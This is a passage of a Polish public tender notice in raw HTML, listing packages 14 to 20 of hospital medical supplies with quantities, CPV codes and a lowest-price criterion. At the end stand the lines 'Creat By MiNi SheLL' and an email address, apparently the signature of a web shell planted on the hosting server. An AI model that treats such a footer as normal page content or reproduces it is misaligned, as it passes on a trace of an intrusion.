<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 14.Lp.Nazwa towaru-asortyment Ilość -szt. 1.Zestaw do kaniulacji żył centralnych 100, 2.Zestaw do kaniulacji żył centralnych 100,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 15.Lp. Nazwa towaru-asortyment Ilość -szt.: 1.Zamknięty system do inhalacji, nebulizacji, do nawilżacza respiratorowego 400, 2.Przewód tlenowy do zamkniętych systemów do inhalacji, odporny na zgniatanie 400, 3.Zestaw drenów do drenażu klatki piersiowej dwubutelkowego 150 , 4. Trzykomorowe urządzenie do treningu oddechowego 30, 5.Czujnik jednorazowy, sterylny, nie zawierający lateksu, samoprzylepny dla dorosłych 300,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 16.Lp Nazwa towaru-asortyment Ilość -szt.:1.Maska anestetyczna z wstępnie wypełnionym mankietem powietrznym o anatomicznym kształcie zapewniającym wygodne i pewne niskociśnieniowe uszczelnienie 4500, 2. Rurka tracheotomijna foniatryczna z mankietem - dla pacjenta na własnym oddechu 2.1 Rozmiar 7.0,30, 2.2	Rozmiar 8.0,30, 2.3 Rozmiar 9.0, 10, 3. 
Nebulizator do podawania leku, 3.1 maska dla dorosłych 300, 3.2 maska dla dzieci 100, 4.Nebulizator do podawania leku w obwodzie oddechowym 200,5. Maska do podawania tlenu dla dorosłych/dzieci do wysokiej koncentracji tlenu 
5.1 dla dorosłych 20, 5.2 dla dzieci 100, 6.Kaniula dotętnicza z PTEE 400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 17.Lp. Nazwa towaru-asortyment Ilość -szt.:1.Igły do znieczulenia splotów przy użyciu stymulatora Stimuplex 1.1. G 22 x 50 mm,55mm 300, 1.2, G 24 x 25 mm,35mm 50, 1.3. G 20 x 150 mm 25, 2.Zestaw do ciagłego znieczulenia splotow z kaniulą 5, 3.Zestaw do drenażu opłucnej i klatki piersiowej 140, 4. Zestawy do łączonego znieczulenia podpajeczynówkowego i zewnątrzoponowego 5..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet nr 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 18.Lp. Nazwa towaru-asortyment Ilość -szt.:1. Zestawy do podaży żywienia enteralnego za pomocą pompy SPACE jednorazowego użytku 100,  2.Zestawy do podaży żywienia parenteralnego za pomocą pompy SPACE
jednorazowego użytku 200,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 19.Lp. Nazwa towaru-asortyment Ilość -szt.:1.Czujnik do pomiaru rzutu serca 100, 2.Wkłucie centralne z możliwością pomiaru saturacji w żyle głównej: zestaw do wkłucia do żył centralnych metodą  Seldingera, 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 20.Lp.	Nazwa towaru-asortyment	Ilość -szt.:1. Rurka intubacyjna z mankietem niskociśnieniowym z medycznego PCV 1.1. roz.4,0, 100,1.2.	roz.4,5 200,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.17.10.00-9, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com